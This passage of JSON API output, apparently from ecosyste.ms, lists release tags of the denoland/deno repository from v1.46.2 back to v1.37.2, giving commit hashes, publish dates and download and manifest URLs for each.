https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland